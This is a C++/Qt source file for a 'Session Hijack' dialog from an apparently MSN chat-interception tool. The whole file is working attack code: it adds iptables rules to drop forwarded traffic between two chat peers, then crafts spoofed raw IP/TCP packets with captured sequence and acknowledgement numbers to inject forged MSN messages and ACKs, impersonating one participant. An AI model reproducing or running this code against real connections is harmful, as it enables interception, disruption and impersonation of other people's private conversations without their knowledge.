/***************************************************************************
 *   Copyright (C) 2007 by Gabriel Menezes Nunes   *
 *   gabriel@dragaobranco   *
 *                                                                         *
 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 *                                                                         *
 *   This program is distributed in the hope that it will be useful,       *
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
 *   GNU General Public License for more details.                          *
 *                                                                         *
 *   You should have received a copy of the GNU General Public License     *
 *   along with this program; if not, write to the                         *
 *   Free Software Foundation, Inc.,                                       *
 *   59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.             *
 ***************************************************************************/

#include "hijackdlg.h"

#include <qvariant.h>
#include <qpushbutton.h>
#include <qtextbrowser.h>
#include <qtextedit.h>
#include <qlayout.h>
#include <qtooltip.h>
#include <qwhatsthis.h>
#include <qmessagebox.h>

#define __USE_BSD
#include <stdio.h>
#define __FAVOR_BSD
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/if_ether.h>


/*
 *  Constructs a hijackDlg as a child of 'parent', with the
 *  name 'name' and widget flags set to 'f'.
 *
 *  The dialog will by default be modeless, unless you set 'modal' to
 *  TRUE to construct a modal dialog.
 */
hijackDlg::hijackDlg( QWidget* parent, msnShadowItemChat *_chat, int _id, const char* name, bool modal, WFlags fl )
    : QDialog( parent, name, modal, fl ), chat(_chat), id(_id)
{
    if ( !name )
	setName( "hijackDlg" );

    pushButton2 = new QPushButton( this, "pushButton2" );
    pushButton2->setGeometry( QRect( 350, 430, 110, 24 ) );

    pushButton1 = new QPushButton( this, "pushButton1" );
    pushButton1->setGeometry( QRect( 70, 430, 110, 24 ) );

    textBrowser1 = new QTextBrowser( this, "textBrowser1" );
    textBrowser1->setGeometry( QRect( 20, 20, 560, 230 ) );

    textEdit1 = new QTextEdit( this, "textEdit1" );
    textEdit1->setGeometry( QRect( 20, 270, 560, 130 ) );
    languageChange();
    resize( QSize(600, 480).expandedTo(minimumSizeHint()) );
    clearWState( WState_Polished );
	iptables1 = new QProcess();
	iptables1->addArgument("iptables");
	iptables1->addArgument("-A");
	iptables1->addArgument("FORWARD");
	iptables1->addArgument("-s");
	iptables1->addArgument(chat->ip1);
	iptables1->addArgument("-d");
	iptables1->addArgument(chat->ip2);
	iptables1->addArgument("-p");
	iptables1->addArgument("tcp");
	iptables1->addArgument("--sport");
	iptables1->addArgument(QString("%1").arg(chat->port1));
	iptables1->addArgument("--dport");
	iptables1->addArgument(QString("%1").arg(chat->port2));
	iptables1->addArgument("-j");
	iptables1->addArgument("DROP");

	iptables2 = new QProcess();
	iptables2->addArgument("iptables");
	iptables2->addArgument("-A");
	iptables2->addArgument("FORWARD");
	iptables2->addArgument("-s");
	iptables2->addArgument(chat->ip2);
	iptables2->addArgument("-d");
	iptables2->addArgument(chat->ip1);
	iptables2->addArgument("-p");
	iptables2->addArgument("tcp");
	iptables2->addArgument("--sport");
	iptables2->addArgument(QString("%1").arg(chat->port2));
	iptables2->addArgument("--dport");
	iptables2->addArgument(QString("%1").arg(chat->port1));
	iptables2->addArgument("-j");
	iptables2->addArgument("DROP");
	connect(iptables1, SIGNAL(processExited()), this, SLOT(iptables1Exited()));
	connect(iptables2, SIGNAL(processExited()), this, SLOT(iptables2Exited()));
	if(!iptables1->start()){
		QMessageBox::critical(this, "IPTables Error", "Error in IPTables");
		return;
}

	if(!iptables2->start()) {
	QMessageBox::critical(this, "IPTables Error", "Error in IPTables");
		return;
}

	if(!id){
	seq = chat->seq1;
	ack = chat->ack1;
	ip1 = chat->ip1;
	ip2 = chat->ip2;
	port1 = chat->port1;
	port2 = chat->port2;
	isLan = chat->isLan1;
	numberMsg = chat->numberMsg1;
	isLanEmail = chat->isLanEmail1;
	isLanString = chat->isLanString1;
	nick = chat->nick1;
}
	else{
	ip1 = chat->ip2;
	ip2 = chat->ip1;
	port1 = chat->port2;
	port2 = chat->port1;
	seq = chat->seq2;
	ack = chat->ack2;
	isLan = chat->isLan2;
	numberMsg = chat->numberMsg2;
	isLanEmail = chat->isLanEmail2;
	isLanString = chat->isLanString2;
	nick = chat->nick2;
}
	
	connect(pushButton1, SIGNAL(clicked()), this, SLOT(sendMessage()));
	connect(pushButton2, SIGNAL(clicked()), this, SLOT(hijackClose()));
	connect(textEdit1, SIGNAL(returnPressed()), this, SLOT(sendMessage()));

}

/*
 *  Destroys the object and frees any allocated resources
 */
hijackDlg::~hijackDlg()
{
	if(!id){
	chat->hijack1 = NULL;
	chat->isHijack1 = false;
}
	else {
	chat->hijack2 = NULL;
	chat->isHijack2 = false;
}

	iptables1Finish = new QProcess();
	iptables1Finish->addArgument("iptables");
	iptables1Finish->addArgument("-D");
	iptables1Finish->addArgument("FORWARD");
	iptables1Finish->addArgument("-s");
	iptables1Finish->addArgument(chat->ip1);
	iptables1Finish->addArgument("-d");
	iptables1Finish->addArgument(chat->ip2);
	iptables1Finish->addArgument("-p");
	iptables1Finish->addArgument("tcp");
	iptables1Finish->addArgument("--sport");
	iptables1Finish->addArgument(QString("%1").arg(chat->port1));
	iptables1Finish->addArgument("--dport");
	iptables1Finish->addArgument(QString("%1").arg(chat->port2));
	iptables1Finish->addArgument("-j");
	iptables1Finish->addArgument("DROP");

	iptables1Finish->start();
	iptables2Finish = new QProcess();
	iptables2Finish->addArgument("iptables");
	iptables2Finish->addArgument("-D");
	iptables2Finish->addArgument("FORWARD");
	iptables2Finish->addArgument("-s");
	iptables2Finish->addArgument(chat->ip2);
	iptables2Finish->addArgument("-d");
	iptables2Finish->addArgument(chat->ip1);
	iptables2Finish->addArgument("-p");
	iptables2Finish->addArgument("tcp");
	iptables2Finish->addArgument("--sport");
	iptables2Finish->addArgument(QString("%1").arg(chat->port2));
	iptables2Finish->addArgument("--dport");
	iptables2Finish->addArgument(QString("%1").arg(chat->port1));	
	iptables2Finish->addArgument("-j");
	iptables2Finish->addArgument("DROP");
	iptables2Finish->start();
    // no need to delete child widgets, Qt does it all for us
}

void hijackDlg::iptables1Exited() {
	if(!iptables1->normalExit()){
		QMessageBox::critical(this, "IPTables Error", "Error in IPTables");
		delete this;
}
}

void hijackDlg::iptables2Exited() {
	if(!iptables2->normalExit()){
		QMessageBox::critical(this, "IPTables Error", "Error in IPTables");
		delete this;
}
}

void hijackDlg::sendAck(unsigned long seqA, unsigned long ackA) {
struct pseudo_header {
	unsigned long s_addr;
	unsigned long d_addr;
	char zero;
	unsigned char protocol;
	unsigned short length;
};





int packet_size = (sizeof(struct tcphdr) + sizeof(struct ip));
char *packet = (char*)malloc(packet_size);
        struct ip *ip_out = (struct ip*) packet;
	
        struct pseudo_header *pseudo_out = (struct pseudo_header *)(packet + sizeof(struct ip) - sizeof(struct pseudo_header));
	
        struct tcphdr *tcp_out = (struct tcphdr *)(packet + sizeof(struct ip));
	
	memset(packet, 0x00, (sizeof(struct ip) + sizeof(struct tcphdr)));
	struct in_addr saddr, daddr;
	
 saddr.s_addr = inet_addr(ip1.ascii());
 daddr.s_addr = inet_addr(ip2.ascii());
pseudo_out->s_addr = inet_addr(ip1.ascii());
 pseudo_out->d_addr = inet_addr(ip2.ascii());

pseudo_out->length = htons(sizeof(struct tcphdr));
	pseudo_out->protocol = IPPROTO_TCP;
int sock;
	if( (sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
		perror("Socket");
		return;
	}

	int on = 1;

	if ( (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0 ){
		perror("Setsockopt");
		return;
	}
	memset((char *)tcp_out, 0x00, sizeof(struct tcphdr));
	tcp_out->th_sport = htons(port1);
 tcp_out->th_dport = htons(port2);
 tcp_out->th_seq = htonl(seqA);
 tcp_out->th_ack = htonl(ackA);
tcp_out->th_off = 5;
 tcp_out->th_flags = TH_ACK;
 tcp_out->th_win = htons(12000);
 tcp_out->th_sum = 0;
 tcp_out->th_sum = in_cksum((unsigned short *)pseudo_out, sizeof(struct tcphdr) + sizeof(struct pseudo_header));

 memset(packet, 0x00, sizeof(struct ip));
ip_out->ip_v = 4;
 ip_out->ip_hl = 5;
 ip_out->ip_len = packet_size;
 ip_out->ip_off = 0;
 ip_out->ip_ttl = 255;
 ip_out->ip_p = IPPROTO_TCP;
 ip_out->ip_src = saddr;
 ip_out->ip_dst = daddr;

 ip_out->ip_sum = in_cksum((unsigned short*)ip_out, sizeof(struct ip));
	
	struct sockaddr_in raw;
	raw.sin_family = AF_INET;
	raw.sin_port = htons(port2);
	raw.sin_addr.s_addr = inet_addr(ip2);
	sendto(sock, packet, packet_size, 0x00, (struct sockaddr *)&raw, sizeof(raw));

ack = ackA;

}

void hijackDlg::sendAckApp(unsigned int seqA, unsigned int ackA, int numberMsg) {

	struct pseudo_header {
	unsigned long s_addr;
	unsigned long d_addr;
	char zero;
	unsigned char protocol;
	unsigned short length;
};


QString ACK = QString("ACK %1\r\n").arg(numberMsg);

int packet_size = (sizeof(struct tcphdr) + sizeof(struct ip) + ACK.length());
char *packet = (char*)malloc(packet_size);
        struct ip *ip_out = (struct ip*) packet;
	
        struct pseudo_header *pseudo_out = (struct pseudo_header *)(packet + sizeof(struct ip) - sizeof(struct pseudo_header));
	
        struct tcphdr *tcp_out = (struct tcphdr *)(packet + sizeof(struct ip));
	memcpy((packet+sizeof(struct ip) + sizeof(struct tcphdr)), ACK.ascii(), ACK.length());
	memset(packet, 0x00, (sizeof(struct ip) + sizeof(struct tcphdr)));
	struct in_addr saddr, daddr;
	
 saddr.s_addr = inet_addr(ip1.ascii());
 daddr.s_addr = inet_addr(ip2.ascii());
pseudo_out->s_addr = inet_addr(ip1.ascii());
 pseudo_out->d_addr = inet_addr(ip2.ascii());

pseudo_out->length = htons(sizeof(struct tcphdr) + ACK.length());
	pseudo_out->protocol = IPPROTO_TCP;
int sock;
	if( (sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
		perror("Socket");
		return;
	}

	int on = 1;

	if ( (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0 ){
		perror("Setsockopt");
		return;
	}
	memset((char *)tcp_out, 0x00, sizeof(struct tcphdr));
	tcp_out->th_sport = htons(port1);
 tcp_out->th_dport = htons(port2);
 tcp_out->th_seq = htonl(seqA);
 tcp_out->th_ack = htonl(ackA);
tcp_out->th_off = 5;
tcp_out->th_flags = TH_PUSH | TH_ACK;
 tcp_out->th_win = htons(12000);
 tcp_out->th_sum = 0;
 tcp_out->th_sum = in_cksum((unsigned short *)pseudo_out, sizeof(struct tcphdr) + sizeof(struct pseudo_header) + ACK.length());
	
 memset(packet, 0x00, sizeof(struct ip));
ip_out->ip_v = 4;
 ip_out->ip_hl = 5;
 ip_out->ip_len = packet_size;
 ip_out->ip_off = 0;
 ip_out->ip_ttl = 255;
 ip_out->ip_p = IPPROTO_TCP;
 ip_out->ip_src = saddr;
 ip_out->ip_dst = daddr;

 ip_out->ip_sum = in_cksum((unsigned short*)ip_out, sizeof(struct ip));
	
	struct sockaddr_in raw;
	raw.sin_family = AF_INET;
	raw.sin_port = htons(port2);
	raw.sin_addr.s_addr = inet_addr(ip2);
	sendto(sock, packet, packet_size, 0x00, (struct sockaddr *)&raw, sizeof(raw));
ack = ackA;
seq = seqA + ACK.length();
	

}


void hijackDlg::hijackClose() {
	
	delete this;
	
}

void hijackDlg::addMessage(QString nick, QString message) {

	textBrowser1->append(QString("<font color=\"#0000ff\"><b>%1 says:</b><br></font>%2<p></p>").arg(nick).arg(message));
}

void hijackDlg::sendMessage() {

struct pseudo_header {
	unsigned long s_addr;
	unsigned long d_addr;
	char zero;
	unsigned char protocol;
	unsigned short length;
};

QString textUser  = textEdit1->text().mid(0, textEdit1->text().length() - 1);
QString textSend;
int textLen = textUser.length() + 122;
	if(isLan)
	textSend = QString("MSG %1 A %2\r\nMIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\nX-MMS-IM-Format: FN=Helvetica; EF=; CO=000000; CS=0; PF=22\r\n\r\n%3").arg(numberMsg).arg(textLen).arg(textUser);
	else
	textSend.sprintf("MSG %s %s %d\r\nMIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\nX-MMS-IM-Format: FN=Helvetica; EF=; CO=000000; CS=0; PF=22\r\n\r\n%s", isLanEmail.ascii(), isLanString.ascii(), textLen, textUser.ascii());




int packet_size = (sizeof(struct tcphdr) + sizeof(struct ip) + textSend.length());
char *packet = (char*)malloc(packet_size);
        struct ip *ip_out = (struct ip*) packet;
	
        struct pseudo_header *pseudo_out = (struct pseudo_header *)(packet + sizeof(struct ip) - sizeof(struct pseudo_header));
	
        struct tcphdr *tcp_out = (struct tcphdr *)(packet + sizeof(struct ip));
	memcpy((packet+sizeof(struct ip) + sizeof(struct tcphdr)), textSend.ascii(), textSend.length());
	memset(packet, 0x00, (sizeof(struct ip) + sizeof(struct tcphdr)));
	struct in_addr saddr, daddr;
	
 saddr.s_addr = inet_addr(ip1.ascii());
 daddr.s_addr = inet_addr(ip2.ascii());
pseudo_out->s_addr = inet_addr(ip1.ascii());
 pseudo_out->d_addr = inet_addr(ip2.ascii());

pseudo_out->length = htons(sizeof(struct tcphdr) + textSend.length());
	pseudo_out->protocol = IPPROTO_TCP;
int sock;
	if( (sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
		perror("Socket");
		return;
	}

	int on = 1;

	if ( (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0 ){
		perror("Setsockopt");
		return;
	}
	memset((char *)tcp_out, 0x00, sizeof(struct tcphdr));
	tcp_out->th_sport = htons(port1);
 tcp_out->th_dport = htons(port2);
 tcp_out->th_seq = htonl(seq);
 tcp_out->th_ack = htonl(ack);
tcp_out->th_off = 5;
 tcp_out->th_flags = TH_PUSH | TH_ACK;
 tcp_out->th_win = htons(12000);
 tcp_out->th_sum = 0;
 tcp_out->th_sum = in_cksum((unsigned short *)pseudo_out, sizeof(struct tcphdr) + sizeof(struct pseudo_header) + textSend.length());

	
 memset(packet, 0x00, sizeof(struct ip));
ip_out->ip_v = 4;
 ip_out->ip_hl = 5;
 ip_out->ip_len = packet_size;
 ip_out->ip_off = 0;
 ip_out->ip_ttl = 255;
 ip_out->ip_p = IPPROTO_TCP;
 ip_out->ip_src = saddr;
 ip_out->ip_dst = daddr;

 ip_out->ip_sum = in_cksum((unsigned short*)ip_out, sizeof(struct ip));
	
	struct sockaddr_in raw;
	raw.sin_family = AF_INET;
	raw.sin_port = htons(port2);
	raw.sin_addr.s_addr = inet_addr(ip2);
	sendto(sock, packet, packet_size, 0x00, (struct sockaddr *)&raw, sizeof(raw));

seq += textSend.length();


addMessage(nick, textUser);
textEdit1->clear();
	
}

unsigned short  hijackDlg::in_cksum(unsigned short *addr, int len) {
	register int sum = 0;
	u_short answer = 0;
	register u_short *w = addr;
	register int nleft = len;

	while(nleft > 1) {
		sum += *w++;
		nleft -= 2;
	}

	if(nleft == 1) {
		*(u_char *)(&answer) = *(u_char *)w;
		sum += answer;
	}

	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	answer = ~sum;
	return answer;
}

/*
 *  Sets the strings of the subwidgets using the current
 *  language.
 */
void hijackDlg::languageChange()
{
    setCaption( tr( "Session Hijack" ) );
    pushButton2->setText( tr( "Hijack Close" ) );
    pushButton1->setText( tr( "Send" ) );
}

